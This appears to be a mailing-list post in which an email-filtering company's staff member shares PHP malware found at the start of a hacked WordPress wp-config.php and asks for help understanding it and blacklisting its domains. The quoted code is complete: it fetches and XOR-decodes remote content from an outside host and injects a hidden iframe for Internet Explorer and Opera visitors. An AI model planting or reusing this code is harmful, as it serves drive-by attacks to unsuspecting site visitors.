Here's some code I extracted from a hacked web site. I don't know what
it does but I think it night spread viruses. I'd like to see if anyone
understands it. It was added at the beginning of a wordpress site in the
wp-config.php file. I noticed that it pulled data and redirected to
various hacker sites. Maybe we could use it to get a list and blacklist
the hackers domains?
if (!defined('frmDs')){
define('frmDs' ,1);
function frm_dl ($url) {
if (function_exists('curl_init')) {
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$out = curl_exec ($ch);
if (curl_errno($ch) !== 0) $out = false;
curl_close ($ch);
} else {$out = file_get_contents($url);}
return trim($out);
}
function frm_crpt($in){
$il=strlen($in);$o='';
for ($i = 0; $i < $il; $i++) $o.=$in[$i] ^ '*';
return $o;
}
function frm_getfrm()
{
$defframe = '<style>.spiuagx { position:absolute;
left:-882px; top:-1013px; }</style> <div class="spiuagx"><iframe
src="http://wilompgsaf.myfw.us/jquery/get.php?ver=jquery.latest.js";
width="476" height="358"></iframe></div>'; //default frame
$codelink =
'http://wilompgsaf.myfw.us/nc/gnc.php?ver=jquery.latest.js';
if (!$codelink){
return $defframe;
}
$dr='/var/tmp';
$f = $dr.'/sess_'.md5('frm_frame');
if(!file_exists($f) || time() - filemtime($f) > 60*5)
{
$dlc = frm_dl($codelink);
if ($dlc){
if ($fp = @fopen($f, 'w')){
fwrite($fp, frm_crpt($dlc));
fclose($fp);
}
else
return $dlc;
}
else
@unlink($f);
}
$fc = @file_get_contents($f);
return ($fc)?frm_crpt($fc):$defframe;
}
$ua = $_SERVER['HTTP_USER_AGENT'];
if (preg_match('/Windows/', $ua) && preg_match('/MSIE|Opera/',
$ua) ){
error_reporting(0);
if(!isset($_COOKIE['__utmfr']) && $nfc=frm_getfrm() ) {
@setcookie('__utmfr',rand(1,1000),time()+86400*7,'/');
print($nfc);
}
}
}
--
Marc Perkel - Sales/Support
supp...@junkemailfilter.com
http://www.junkemailfilter.com
Junk Email Filter dot com
415-992-3400
